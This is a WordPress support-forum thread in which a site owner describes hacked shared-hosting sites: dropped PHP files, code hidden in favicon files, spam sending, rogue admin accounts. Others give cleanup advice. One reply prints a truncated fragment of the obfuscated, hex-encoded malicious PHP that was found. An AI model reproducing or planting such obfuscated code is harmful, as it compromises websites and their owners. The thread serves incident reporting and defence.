malicious code inject

  • I have the latest WP version and just had a malicious code injection.

    I wonder, how can that happen, and what can be done for future protection?

    On 2 domains some directories had been tempered with and had a brand new change date.

    They were on one domain:
    wp-content/themes/twentysixteen
    wp-content/themes/twentysixteen/template-parts

    The twentysixteen theme was installed, but another theme was active. It was updated to the latest version though (WP updates themes no matter they are active or not)

    The other domain:
    wp-includes/rest-api
    wp-content/plugins/wp-members/admin

    wp-members is popular plugin that gets often updated?

    So how to prevent such malicious code injections? Or if they happen, how to notice them?

Viewing 14 replies - 1 through 14 (of 14 total)

  • During the development stage..Did you discourage search engines?
    When you were done developing the site…Did you install a Security plugin?

    Did you delete all the unused plugins?

    Thread Starter yellofish

    (@yellofish)

    I installed WP from a docker (shared hosting). I have no security plugin though, I just saw that there are such plugins.

    Is the website hacked or has a code, whats the website address

    Thread Starter yellofish

    (@yellofish)

    Some more details. 2 Sites got hacked. Both were 4.8.2 with all updates. One was just about 1 week old.

    They put a file called ssegtj.zip in the root directory.

    In it are

    /goren/ > 14 files
    /hopeir/ > 15 files
    .htaccess
    otiarw.php
    vrairue.php

    I wonder how they managed to get that on the site?

    In the meantime I installed the sucuri plugin and I hope that can help a little. Can’t it?

    Adam

    (@adamlachut)

    Sucuri in free version and other security plugins (like Wordfence) in free versions probably won’t help too much.

    You need to assume that it’s compromised hosting account, not single domain or directory, so IMHO you need to start with blocking an access to this hosting account, change all credentials and clean it file by file. If you have more WP (or other CMSes installed), you need at least update all of them.

    Adam

    Thread Starter yellofish

    (@yellofish)

    Correct, Sucuri didn’t do anything. I got another malicious code injection.

    They install code and send SPAM from the infected domain.

    Any hints how to prevent that are appreciated.

    Thread Starter yellofish

    (@yellofish)

    I found favicon****.ico files that contained PHP code, that certainly can’t be right or?

    Also found 2 scrips the SPAM delivery identified as ‘sender’:

    /public_html/domain01.coms/wp-content/advanced-cache.php

    /public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php

    xackoaqb.php was a very new file, but advanced-cache.php was a few month old.

    What is best now? Completely delete and reinstall the domains?

    Today I noticed many links in search results with otiarw.php in URLs and it seems that all of them redirect to malicious sites. I’ve searched Google for otiarw.php and there are 2,890,000 results. Root URLs of sites, that I’ve randomly checked either works OK of fail with a PHP error. All that I’ve checked has wp-admin page

    Similar issue here (spam, malicious files and malicious code in themes header). WordPress was updated to the latest stable version but I can’t tell for sure that the issue started after the update of prior to it, because some domains have older malicious files than the update, while on other domains the malicious files are newer than the update.
    For the moment we were not able to determine where the vulnerability is coming from but the code is doing a lot of things so I guess that completely deleting and reinstalling is a good start.

    Moderator t-p

    (@t-p)

    side note to @cvoicu,

    If the troubleshooting already discussed made no difference for you, then, as per the Forum Welcome, please post your own topic.

    @t-p I don’t think there’s need to post my own topic as I’ve basically replied to yellofish’s question about what should he do next. Thanks!

    Thread Starter yellofish

    (@yellofish)

    I deleted quite a lot of PHP files with base64 script in it. I can see plenty of hits looking for exactly those files from various IPs. I also installed Wordfence and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I am pretty OK for now.

    Another thing I did is renaming the /wp-content/ folder to something else. That will irritate the bots that look for certain plugins for a while (I hope).

    Below just some idea how one of those (non base64) look like:

    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
$GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];
    Moderator t-p

    (@t-p)

    If you believe your site is hacked, carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Just came across similar issues. Found two users in the database with admin rights (one from three years ago) that wasn’t supposed to be there

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘malicious code inject’ is closed to new replies.

Tags